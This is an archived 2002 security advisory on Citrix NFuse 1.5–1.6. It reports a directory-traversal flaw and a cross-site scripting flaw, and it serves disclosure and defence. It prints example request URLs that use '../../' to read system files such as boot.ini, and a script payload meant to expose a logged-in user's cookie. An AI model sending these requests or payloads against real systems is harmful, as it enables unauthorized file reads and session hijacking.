Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5225.htm

Citrix NFuse directory trversal and cross site scripting



2nd Apr 2002 [SBWID-5225]
COMMAND

	Citrix NFuse directory trversal and cross site scripting

SYSTEMS AFFECTED

	 Nfuse 1.5, 1.51, 1.6

	

PROBLEM

	Eric Budke [http://www.foundstone.com] posted :
	

	A command such as:
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica 

	

	Can be replaced with one like this:
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ 

	

	It seems to work with things in winnt and  winnt/system32,  it  doesn\'t
	seem to like things back on the c:\\ which gives up its very minor  vuln
	of the path of wwwroot.
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories 

	

	Gives up:
	

	There was an error:The Citrix HTML template specified does not exist or 

	could not be accessed. The template file specified was: 

	c:\\inetpub\\wwwroot\\../../boot.ini

	

	-Also-
	

	Eric DETOISIEN of GLOBAL SECURE [http://www.global-secure.fr] says :
	

	NFuse provides several jsp (or asp) pages to make a  portal.=20  In  one
	this page (launch.jsp or launch.asp) it\'s possible to  use  the  method
	getLastError() of the TemplateParser object  (in  fact  this  method  is
	inherited from the WebPNObject object).
	

	The CSS problem comes  from  the  getLastError()  method.  It  does  not
	filter the URL parameters that cause the problem.
	

	 Example :

	 =======

	

	if your launch.jsp contains a bit of code like this :
	

	if (!parser.Parse())=20

	{

	    out.println(\"Error: \" + parser.getLastError());

	}

	else

	{

	...

	}

	

	With a request like this you can get the cookie with login and  password
	(the user must be connected before) :
	

	http://my_nfuse_portal.com/launch.jsp?NFuse_Application=3D<script>alert(document.cookie);</script>

	

SOLUTION

	Directory traversal bug is presumably solved in v1.6, as for  the  cross
	site scripting do not print  result  of  GetLastError()  or  filter  the
	result before.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH